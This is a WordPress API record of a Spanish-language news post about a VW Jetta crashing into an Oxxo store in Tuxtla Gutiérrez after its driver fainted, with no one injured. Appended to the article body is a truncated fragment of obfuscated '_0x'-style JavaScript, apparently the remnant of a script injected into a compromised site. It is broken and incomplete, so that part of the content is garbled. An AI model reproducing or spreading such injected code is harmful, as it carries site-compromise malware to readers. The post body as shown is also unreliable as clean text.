{"id":23147,"date":"2025-07-24T05:06:53","date_gmt":"2025-07-24T05:06:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23147"},"modified":"2025-07-24T05:06:54","modified_gmt":"2025-07-24T05:06:54","slug":"jetta-se-estampa-contra-oxxo-en-la-patria-nueva","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23147","title":{"rendered":"Jetta se estampa contra Oxxo en la Patria Nueva"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000238408-919x1024.jpg\" alt=\"\" class=\"wp-image-23148\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000238408-919x1024.jpg 919w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000238408-269x300.jpg 269w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000238408-768x855.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000238408.jpg 1080w\" sizes=\"auto, (max-width: 919px) 100vw, 919px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 23 de julio del 2025. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde el conductor de un VW Jetta se estrell\u00f3 contra la fachada de un Oxxo ubicado en la Colonia Patria Nueva de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor se desmay\u00f3 cuando circulaba en la Avenida Arboledas y termin\u00f3 estrell\u00e1ndose contra la tienda de conveniencia.<\/p>\n\n\n\n<p>Resultado del golpe, la unidad termin\u00f3 pr\u00e1cticamente desecha del frente.<\/p>\n\n\n\n<p>A pesar de lo aparatoso del accidente no hubo heridos.<\/p>\n\n\n\n<p>El conductor de la unidad fue valorado por param\u00e9dicos y la unidad fue trasladada a un corral\u00f3n en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 23 de julio del 2025. Tuxtla Guti\u00e9rrez.- Este mi\u00e9rcoles por la tarde el conductor de un VW Jetta se estrell\u00f3 contra la fachada de un Oxxo ubicado en la Colonia Patria Nueva de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor se desmay\u00f3 cuando circulaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23148,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-23147","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23147","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23147"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23147\/revisions"}],"predecessor-version":[{"id":23149,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23147\/revisions\/23149"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23148"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23147"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23147"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23147"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}